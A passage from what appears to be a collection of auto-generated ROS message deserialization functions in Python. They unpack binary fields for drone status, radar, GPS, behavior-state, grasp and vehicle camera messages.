python3:\n self.flight_mode_ll = str[start:end].decode('utf-8')\n else:\n self.flight_mode_ll = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_estimation = str[start:end].decode('utf-8')\n else:\n self.state_estimation = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.position_control = str[start:end].decode('utf-8')\n else:\n self.position_control = str[start:end]\n _x = self\n start = end\n end += 10\n (_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load,) = _struct_2B2f.unpack(str[start:end])\n self.serial_interface_enabled = bool(self.serial_interface_enabled)\n self.serial_interface_active = bool(self.serial_interface_active)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.motor_status = str[start:end].decode('utf-8')\n else:\n self.motor_status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.gps_status = str[start:end].decode('utf-8')\n else:\n self.gps_status = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset,) = _struct_iBf.unpack(str[start:end])\n self.have_SSDK_parameters = bool(self.have_SSDK_parameters)\n start = end\n end += 16\n self.rc_channel = _struct_8H.unpack(str[start:end])\n start = end\n end += 12\n self.control_axes = _struct_6H.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.control_buttons = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 48\n (_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y,) = _struct_6d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def parse_and_decode(cls, data: bytes) -> \"Message\":\n if len(data) < cls.calc_size() + 1:\n raise NotEnoughData()\n if data[0] != cls.type:\n raise InvalidType()\n\n return cls(*unpack('<' + cls.fmt, data[1:cls.calc_size() + 1]))", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1,) = _get_struct_56B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude,) = _get_struct_2B6f2Bb().unpack(str[start:end])\n self.is_mr_update = bool(self.is_mr_update)\n self.is_lr_update = bool(self.is_lr_update)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.cond_transition is None:\n self.cond_transition = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_path = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_path = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.initial_state_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.initial_state_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.input_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.input_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.output_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.output_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.cond_outcome.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_transition = []\n for i in range(0, length):\n val1 = flexbe_msgs.msg.OutcomeCondition()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_name.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_outcome.append(val2)\n self.cond_transition.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.behavior_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.behavior_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_values = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_values.append(val1)\n start = end\n end += 8\n self.position = _get_struct_2f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.outcomes = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.outcomes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.transitions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.transitions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sb'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.autonomy = s.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_remapping = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_remapping.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 1\n (self.success,) = _struct_B.unpack(str[start:end])\n self.success = bool(self.success)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 34\n (_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs,) = _struct_H6B5f2Bf.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.sv is None:\n self.sv = None\n end = 0\n _x = self\n start = end\n end += 8\n (_x.rcvTOW, _x.week, _x.numSV, _x.reserved1,) = _get_struct_ih2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sv = []\n for i in range(0, length):\n val1 = ublox_msgs.msg.RxmRAW_SV()\n _x = val1\n start = end\n end += 24\n (_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli,) = _get_struct_2dfB2bB().unpack(str[start:end])\n self.sv.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 36\n (_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4,) = _get_struct_H2BiIbB4H2B3I().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.type is None:\n self.type = std_msgs.msg.String()\n if self.parent_name is None:\n self.parent_name = std_msgs.msg.String()\n if self.name is None:\n self.name = std_msgs.msg.String()\n if self.pose is None:\n self.pose = geometry_msgs.msg.Pose()\n if self.sensed_objects is None:\n self.sensed_objects = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.sim_step,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.type.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.type.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parent_name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.parent_name.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.name.data = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count,) = _get_struct_2f7dI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sB'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.triggered = s.unpack(str[start:end])\n self.triggered = list(map(bool, self.triggered))\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.range = s.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.measurement = s.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sensed_objects = []\n for i in range(0, length):\n val1 = std_msgs.msg.String()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.data = str[start:end]\n self.sensed_objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.sensed_objects_map = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.name = str[start:end].decode('utf-8')\n else:\n self.model.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v15 = val1.position\n _x = _v15\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v16 = val1.orientation\n _x = _v16\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v17 = val1.stamp\n _x = _v17\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v18 = val1.position\n _x = _v18\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v19 = val1.orientation\n _x = _v19\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v20 = val1.position\n _x = _v20\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v21 = val1.orientation\n _x = _v21\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.model.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.name = str[start:end].decode('utf-8')\n else:\n self.data.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v22 = val1.position\n _x = _v22\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v23 = val1.orientation\n _x = _v23\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v24 = val1.stamp\n _x = _v24\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v25 = val1.position\n _x = _v25\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v26 = val1.orientation\n _x = _v26\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v27 = val1.position\n _x = _v27\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v28 = val1.orientation\n _x = _v28\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.data.track.channels.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n end = 0\n _x = self\n start = end\n end += 128\n (_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z,) = _get_struct_12d2f3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 57\n (_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ,) = _get_struct_b7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.localStamp is None:\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n if self.globalStamp is None:\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n if self.camera is None:\n self.camera = vehicle_msgs.msg.Camera()\n if self.camera_obj is None:\n self.camera_obj = None\n if self.camera_lane is None:\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.globalStamp.time, 